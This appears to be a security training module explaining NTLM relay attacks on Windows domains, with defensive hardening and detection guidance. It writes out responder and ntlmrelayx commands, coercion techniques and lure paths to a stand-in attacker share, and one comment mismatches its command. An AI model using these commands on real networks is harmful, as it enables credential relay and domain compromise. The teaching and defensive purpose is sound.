NTLM Relay is one of the most effective attacks against modern Windows environments β and it works even on fully-patched systems if defenders haven’t enabled specific hardening. This module covers how relay works, common exploit chains, and the defences that actually block it.
How NTLM authentication works
NTLM is a challenge-response protocol. Client sends NTLM_NEGOTIATE; server responds with a challenge; client hashes its password with the challenge and returns the response; server verifies.
Critical design flaw: NTLM does not verify to WHOM the client is authenticating. If an attacker can get the client to initiate NTLM auth to the attacker’s server, the attacker can relay the auth to a different server and impersonate the client there.
The classic attack chain
Attacker on the network runs responder or ntlmrelayx
Victim tries to resolve a mistyped hostname β gets attacker’s IP
Victim sends NTLM auth to attacker
Attacker relays to a target server (file share, MSSQL, LDAP, IIS)
Attacker is now authenticated as the victim on the target
Exploitation tools
# Responder β listens + poisons LLMNR/NBT-NS
responder -I eth0 -wFv
# ntlmrelayx β relays captured NTLM to target
ntlmrelayx.py -tf targets.txt -smb2support
# Relay to LDAP to add user to Domain Admins
ntlmrelayx.py -t ldap://dc.corp.com --add-computer ATTACKER
# Relay to ADCS (PetitPotam + ADCS = domain admin)
ntlmrelayx.py -t http://ca.corp.com/certsrv/certfnsh.asp --adcs --template DomainController
Coercion methods
Instead of waiting for accidental auth, attackers force it via:
PetitPotam β abuses MS-EFSRPC to force a DC to authenticate
PrintNightmare / PrinterBug β Print Spooler service can be tricked into authenticating
DFSCoerce β abuses MS-DFSNM
Link-local β malicious file paths in emails, docs (UNC: \\attacker\share)
WebDAV β <img src=”file://\\attacker\share”> in HTML
Defences that actually block NTLM relay
SMB signing required β on DCs and servers. Forces every SMB packet to be signed; relay detected and rejected
LDAP signing required β same for LDAP
Channel binding (EPA β Extended Protection for Authentication) β HTTP/LDAPS verifies the TLS channel binding, preventing relay across different channels
Disable NTLM entirely β GPO setting. Enterprise goal but requires AD hygiene.
Disable LLMNR, NBT-NS, mDNS β kills the poisoning vector
Kerberos-only for critical services β relay doesn’t work against Kerberos
Smart-card / Windows Hello for Business β eliminates NTLM primary auth
Sysmon + detection rules
Event 4624 LogonType 3 from unexpected source IPs
Event 4648 (explicit credentials) from machine accounts to sensitive targets
